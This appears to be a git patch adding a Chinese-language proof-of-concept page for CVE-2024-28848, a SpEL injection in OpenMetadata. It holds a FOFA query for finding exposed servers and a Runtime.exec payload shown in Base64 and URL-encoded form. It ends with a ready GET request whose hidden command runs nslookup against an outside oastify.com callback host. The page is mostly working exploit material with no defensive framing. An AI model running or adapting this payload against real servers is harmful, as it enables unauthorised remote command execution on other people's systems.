From db9d6fd9250a26f988296bbd6144a49b2786e20f Mon Sep 17 00:00:00 2001
From: wy876 <139549762+wy876@users.noreply.github.com>
Date: Thu, 2 May 2024 14:51:49 +0800
Subject: [PATCH] =?UTF-8?q?Create=20OpenMetadata-SpEL=E6=B3=A8=E5=85=A5(CV?=
 =?UTF-8?q?E-2024-28848).md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
 OpenMetadata-SpEL注入(CVE-2024-28848).md | 30 ++++++++++++++++++++++++
 1 file changed, 30 insertions(+)
 create mode 100644 OpenMetadata-SpEL注入(CVE-2024-28848).md
diff --git a/OpenMetadata-SpEL注入(CVE-2024-28848).md b/OpenMetadata-SpEL注入(CVE-2024-28848).md
new file mode 100644
index 0000000..be672f4
--- /dev/null
+++ b/OpenMetadata-SpEL注入(CVE-2024-28848).md
@@ -0,0 +1,30 @@
+## OpenMetadata-SpEL注入(CVE-2024-28848)
+
+只有经过身份验证的用户才能访问 /api/v1/policies, 未经身份验证的用户将无法访问这些 API 来利用此漏洞。用户必须存在于 OpenMetadata 中,并且已对自己进行身份验证才能利用此漏洞。
+
+## fofa
+```
+icon_hash="733091897"
+```
+
+以 Base64 编码
+
+=>`touch /tmp/pwneddG91Y2ggL3RtcC9wd25lZA==`
+
+运行系统命令的
+
+SpEL 表达式:`T(java.lang.Runtime).getRuntime().exec(new java.lang.String(T(java.util.Base64).getDecoder().decode("dG91Y2ggL3RtcC9wd25lZA==")))`
+
+使用 URL 编码对有效负载进行编码:
+
+```
+%54%28%6a%61%76%61%2e%6c%61%6e%67%2e%52%75%6e%74%69%6d%65%29%2e%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%6e%65%77%20%6a%61%76%61%2e%6c%61%6e%67%2e%53%74%72%69%6e%67%28%54%28%6a%61%76%61%2e%75%74%69%6c%2e%42%61%73%65%36%34%29%2e%67%65%74%44%65%63%6f%64%65%72%28%29%2e%64%65%63%6f%64%65%28%22%64%47%39%31%59%32%67%67%4c%33%52%74%63%43%39%77%64%32%35%6c%5a%41%3d%3d%22%29%29%29
+```
+
+## poc
+```
+GET /api/v1/policies/validation/condition/%54%28%6a%61%76%61%2e%6c%61%6e%67%2e%52%75%6e%74%69%6d%65%29%2e%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%6e%65%77%20%6a%61%76%61%2e%6c%61%6e%67%2e%53%74%72%69%6e%67%28%54%28%6a%61%76%61%2e%75%74%69%6c%2e%42%61%73%65%36%34%29%2e%67%65%74%44%65%63%6f%64%65%72%28%29%2e%64%65%63%6f%64%65%28%22%62%6e%4e%73%62%32%39%72%64%58%41%67%61%58%70%73%4e%7a%45%33%62%33%42%69%62%57%52%79%5a%57%46%6f%61%33%4a%6f%63%44%4e%72%63%32%70%72%61%47%4a%75%4d%6d%4a%7a%65%6d%67%75%62%32%46%7a%64%47%6c%6d%65%53%35%6a%62%32%30%3d%22%29%29%29 HTTP/2
+Host: sandbox.open-metadata.org
+Authorization: Bearer
+
+```